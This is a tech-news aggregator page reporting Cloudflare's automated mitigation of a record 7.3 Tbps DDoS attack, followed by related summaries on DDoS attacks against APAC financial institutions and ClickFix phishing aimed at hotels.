Cloudflare thwarts record 7.3 Tbps DDoS attack with automation

Cloudflare has confirmed it recently mitigated what it describes as the largest distributed denial-of-service (DDoS) attack ever publicly disclosed, clocking in at 7.3 terabits per second (Tbps), surpassing previous known records.
The attack, which occurred in mid-May 2025, targeted a hosting provider customer utilising Cloudflare's Magic Transit service for network defence. According to Cloudflare data, this incident follows closely on the heels of attacks recorded at 6.5 Tbps and 4.8 billion packets per second, illustrating that DDoS attacks are continuing to increase in both scale and complexity.
Cloudflare stated that the 7.3 Tbps attack was 12% larger than its previous record and 1 Tbps greater than another recent attack reported by security journalist Brian Krebs.
Attack analysis
The 7.3 Tbps DDoS attack delivered a total of 37.4 terabytes of data within a 45-second window. During the attack, the targeted IP address was bombarded across an average of 21,925 destination ports, reaching a peak of 34,517 destination ports per second. The distribution of source ports mirrored this targeting method.
The attack employed several vectors but was dominated by UDP floods, constituting 99.996% of total traffic. The residual traffic, amounting to 1.3 GB, involved QOTD reflection, Echo reflection, NTP reflection, Mirai UDP floods, Portmap flood, and RIPv1 amplification techniques. Each vector was identified and catalogued, with Cloudflare detailing how organisations could protect both themselves and the broader Internet from such forms of abuse.
Cloudflare explained that the UDP DDoS component worked by sending large volumes of UDP packets to random or specific destination ports, either to saturate the Internet link or overwhelm network appliances. Other vectors, such as the QOTD (Quote of the Day), Echo, NTP, Portmap, and RIPv1, exploited vulnerabilities in legacy protocols and services to reflect and amplify attack traffic onto target systems.
Global scale
The attack was notable for its global reach. Traffic originated from more than 122,145 source IP addresses across 5,433 autonomous systems in 161 countries. Nearly half of the attack traffic came from Brazil and Vietnam, accounting for around twenty-five percent each. The remainder was largely attributable to sources in Taiwan, China, Indonesia, Ukraine, Ecuador, Thailand, the United States, and Saudi Arabia.
At an autonomous system level, Telefonica Brazil (AS27699) contributed 10.5% of attack traffic, with Viettel Group (AS7552), China Unicom (AS4837), Chunghwa Telecom (AS3462), and China Telecom (AS4134) among the other major sources. The attack saw an average of 26,855 unique source IP addresses per second, peaking at 45,097.
Technical response
Cloudflare utilised the global anycast architecture to divert and dissipate the massive influx of traffic. As packets arrived at Cloudflare's network edge, they were routed to the closest data centre. This incident was managed across 477 data centres in 293 locations worldwide, with some regions operating multiple facilities due to traffic volume.
Detection and mitigation were handled by Cloudflare's automated systems, which operate independently in each data centre. The Cloudflare global network runs every service in every data centre. This includes our DDoS detection and mitigation systems. This means that attacks can be detected and mitigated fully autonomously, regardless of where they originate from.
Upon arrival, data packets were intelligently distributed to available servers where they were sampled for analysis. Cloudflare employed the denial of service daemon (dosd), a heuristic engine that reviews packet headers and anomalies for malicious patterns. The system then generated multiple permutations of digital fingerprints specific to the attack, seeking patterns that maximised blocking efficacy while minimising impact on legitimate traffic.
Within data centres, real-time intelligence was shared by servers multicasting fingerprint information, refining mitigation on both a local and global scale. When a fingerprint surpassed predefined thresholds, mitigation rules were compiled and deployed as extended Berkeley Packet Filter (eBPF) programs to block the offending traffic. Once the attack ceased, associated rules were removed automatically.
Botnet feed and future mitigation
Cloudflare also maintains a free DDoS Botnet Threat Feed to help Internet service providers and hosting companies identify malicious traffic originating within their own infrastructure. The company said that over 600 organisations have subscribed to this service, allowing them to receive up-to-date lists of offending IP addresses engaged in DDoS attacks.
Recommendations from Cloudflare emphasise tailored defences to address the unique characteristics of each network or application, with care taken to ensure that mitigation steps do not inadvertently disrupt legitimate traffic, particularly for services that depend on UDP or legacy protocols.
Cloudflare's team highlighted that these successful defences occurred entirely without human intervention, alerting, or incident escalation, underscoring the shift towards fully autonomous, distributed mitigation strategies in response to modern DDoS threats.

Try Our AI Features

Explore what Daily8 AI can do for you:

Learn with AIFact CheckingText to SpeechAI Summary

Related Articles

Techday NZ

18 hours ago

• Techday NZ

Cloudflare thwarts record 7.3 Tbps DDoS attack with automation

Cloudflare has confirmed it recently mitigated what it describes as the largest distributed denial-of-service (DDoS) attack ever publicly disclosed, clocking in at 7.3 terabits per second (Tbps), surpassing previous known records. The attack, which occurred in mid-May 2025, targeted a hosting provider customer utilising Cloudflare's Magic Transit service for network defence. According to Cloudflare data, this incident follows closely on the heels of attacks recorded at 6.5 Tbps and 4.8 billion packets per second, illustrating that DDoS attacks are continuing to increase in both scale and complexity. Cloudflare stated that the 7.3 Tbps attack was 12% larger than its previous record and 1 Tbps greater than another recent attack reported by security journalist Brian Krebs. Attack analysis The 7.3 Tbps DDoS attack delivered a total of 37.4 terabytes of data within a 45-second window. During the attack, the targeted IP address was bombarded across an average of 21,925 destination ports, reaching a peak of 34,517 destination ports per second. The distribution of source ports mirrored this targeting method. The attack employed several vectors but was dominated by UDP floods, constituting 99.996% of total traffic. The residual traffic, amounting to 1.3 GB, involved QOTD reflection, Echo reflection, NTP reflection, Mirai UDP floods, Portmap flood, and RIPv1 amplification techniques. Each vector was identified and catalogued, with Cloudflare detailing how organisations could protect both themselves and the broader Internet from such forms of abuse. Cloudflare explained that the UDP DDoS component worked by sending large volumes of UDP packets to random or specific destination ports, either to saturate the Internet link or overwhelm network appliances. Other vectors, such as the QOTD (Quote of the Day), Echo, NTP, Portmap, and RIPv1, exploited vulnerabilities in legacy protocols and services to reflect and amplify attack traffic onto target systems. Global scale The attack was notable for its global reach. Traffic originated from more than 122,145 source IP addresses across 5,433 autonomous systems in 161 countries. Nearly half of the attack traffic came from Brazil and Vietnam, accounting for around twenty-five percent each. The remainder was largely attributable to sources in Taiwan, China, Indonesia, Ukraine, Ecuador, Thailand, the United States, and Saudi Arabia. At an autonomous system level, Telefonica Brazil (AS27699) contributed 10.5% of attack traffic, with Viettel Group (AS7552), China Unicom (AS4837), Chunghwa Telecom (AS3462), and China Telecom (AS4134) among the other major sources. The attack saw an average of 26,855 unique source IP addresses per second, peaking at 45,097. Technical response Cloudflare utilised the global anycast architecture to divert and dissipate the massive influx of traffic. As packets arrived at Cloudflare's network edge, they were routed to the closest data centre. This incident was managed across 477 data centres in 293 locations worldwide, with some regions operating multiple facilities due to traffic volume. Detection and mitigation were handled by Cloudflare's automated systems, which operate independently in each data centre. The Cloudflare global network runs every service in every data centre. This includes our DDoS detection and mitigation systems. This means that attacks can be detected and mitigated fully autonomously, regardless of where they originate from. Upon arrival, data packets were intelligently distributed to available servers where they were sampled for analysis. Cloudflare employed the denial of service daemon (dosd), a heuristic engine that reviews packet headers and anomalies for malicious patterns. The system then generated multiple permutations of digital fingerprints specific to the attack, seeking patterns that maximised blocking efficacy while minimising impact on legitimate traffic. Within data centres, real-time intelligence was shared by servers multicasting fingerprint information, refining mitigation on both a local and global scale. When a fingerprint surpassed predefined thresholds, mitigation rules were compiled and deployed as extended Berkeley Packet Filter (eBPF) programs to block the offending traffic. Once the attack ceased, associated rules were removed automatically. Botnet feed and future mitigation Cloudflare also maintains a free DDoS Botnet Threat Feed to help Internet service providers and hosting companies identify malicious traffic originating within their own infrastructure. The company said that over 600 organisations have subscribed to this service, allowing them to receive up-to-date lists of offending IP addresses engaged in DDoS attacks. Recommendations from Cloudflare emphasise tailored defences to address the unique characteristics of each network or application, with care taken to ensure that mitigation steps do not inadvertently disrupt legitimate traffic, particularly for services that depend on UDP or legacy protocols. Cloudflare's team highlighted that these successful defences occurred entirely without human intervention, alerting, or incident escalation, underscoring the shift towards fully autonomous, distributed mitigation strategies in response to modern DDoS threats.

Techday NZ

11-06-2025

• Techday NZ

APAC financial sector faces 245% surge in DDoS attacks, report finds

Financial institutions in the Asia-Pacific (APAC) region saw a 245% rise in volumetric Layer 3 and 4 distributed denial-of-service (DDoS) attacks last year, accounting for 38% of such incidents globally, according to a new joint report by FS-ISAC and Akamai. The report, titled From Nuisance to Strategic Threat: DDoS Attacks Against the Financial Sector, outlines the growing scale and persistence of DDoS attacks targeting APAC's financial sector. In 2023, APAC only accounted for 11% of these incidents, highlighting the extent of the increase. The analysis found that over 20 financial institutions across six countries were affected by sustained DDoS campaigns in the fourth quarter of 2024, creating downstream risk that could impact up to USD $8 trillion in value. These attacks were notable not for their size, but for their persistence and continuity, a trend not previously seen in APAC. The wave of attacks impacted multiple sectors, including retail banking, payment processing, investment banking, and financial governmental institutions. The report attributes a significant growth in application-level (Layer 7) attacks to the increasing use of application programming interfaces (APIs) within financial services. This expansion of digital infrastructure has introduced new vulnerabilities and a broader attack surface for malicious actors. FS-ISAC's Chief Intelligence Officer and Managing Director, EMEA, Teresa Walsh, commented on the changing character of DDoS threats: "DDoS attacks are becoming increasingly sophisticated, evolving from simple network flooding to targeted, multi-dimensional assaults that exploit intricate vulnerabilities across the entire supply chain. As threat tactics continue to evolve — including those impacting APAC's increasingly digital financial systems — we must ensure our technical defenses evolve and our people, tools, and processes work seamlessly together. It is critical that we harden our infrastructure and foster a culture of continuous vigilance and collaboration to protect continuity and customer trust." Reuben Koh, Director of Security Technology & Strategy, APJ at Akamai, highlighted the changing nature of DDoS campaigns in the region: "DDoS attacks in APAC are no longer blunt-force attempts, but sophisticated multi-vector campaigns that exploit vulnerable systems and exposed APIs. As highly coveted target sectors like financial services, commerce, and manufacturing accelerate digital growth, these continuous attacks pose growing operational and reputational risks, and organizations must work with trusted cybersecurity partners who can provide the intelligence, scalability, and agility needed to defend themselves in today's threat landscape." The joint report also connects the increase in attacks to broader developments, including ongoing geopolitical tensions such as the Israel-Hamas and Russia-Ukraine conflicts. These events have led to a noted rise in ideologically driven hacktivism and blurred the lines between DDoS-for-Hire groups, hacktivists, and state-sponsored actors. The proliferation of DDoS-for-Hire platforms has made these attack tools accessible to a wider range of threat actors. Globally, the financial sector remained the most targeted industry segment for Layer 3 and 4 DDoS attacks, making up 37% of incidents. This marks the second consecutive year that financial services have led in reported attack numbers, followed by gaming at 20% and manufacturing at 17%. No other sector experienced a similar surge, according to the report's findings. The publication discusses strategies for improving defences through the FS-ISAC and Akamai-developed DDoS Maturity Model. This framework provides a benchmark for readiness and recommends targeted investment in defence strategies for organisations managing financial infrastructure and sensitive data. The DDoS Maturity Model highlights several key actions for financial institutions and related entities: Adopt real-time behavioural analytics and traffic baselining Implement threat intelligence-led automation for detection and mitigation Strengthen DNS and API security with continuous testing and hardening Use geo-IP filtering to reduce exposure from high-risk regions The report also contains regional data, profiles of hacktivist groups, and an overview of mitigation strategies and best cyber hygiene practices. It notes the importance of mapping organisational capabilities and practices against different stages of maturity in DDoS defence, offering a structured approach to managing a rising strategic threat. Akamai's collaboration with FS-ISAC on this research builds on the company's involvement in FS-ISAC's Critical Providers Program, which was launched to strengthen supply chain security within the financial sector.

Techday NZ

09-06-2025

• Techday NZ

ClickFix phishing surge spoofs Booking.com to target hotels

Research from Cofense Intelligence has identified a series of phishing campaigns targeting hotel chains in the accommodation and food services sector. These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, accounting for 47% of the total campaign volume. The phishing emails impersonate directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware. ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, to inadvertently run a malicious script. This script is commonly delivered through users' clipboards, typically triggered by a specific button on the fraudulent site. Analysis from Cofense Intelligence shows that 75% of campaigns using fake CAPTCHAs employed spoofing templates, while other less frequent variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. Among these, 64% delivered RATs, 47% information stealers, and 11% were observed distributing both types of malware. This campaign has been increasing in popularity since November 2024, with 47% of total campaign volume being from March 2025 alone. 75% of all active threat reports (ATRs) with fake CAPTCHAs used ClickFix templates. Other notable but rare ClickFix templates include Cloudflare Turnstile-spoofing and cookie consent banner-styled templates. 64% of campaign ATRs delivered RATs, 47% of campaign ATRs delivered information stealers, and 11% of campaign ATRs were seen delivering both RATs and information stealers. 53% of all campaign ATRs deliver XWorm RAT, making it the most popular RAT used in these campaigns. Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most popular information stealers for these campaigns. The most commonly observed malware is the XWorm RAT, present in 53% of the analysed campaigns. Other malware includes Pure Logs Stealer and DanaBot, making up 19% and 14% of cases, respectively. The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links. Some emails specify that the link will only function on Windows, and the recipients who access the site on other operating systems receive a message indicating this limitation. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications, which, once executed, can install RATs or steal data from victim devices. ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run command prompt. Sometimes, these scripts are obfuscated to appear as verification codes, increasing the likelihood that the user will not recognise them as harmful. In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.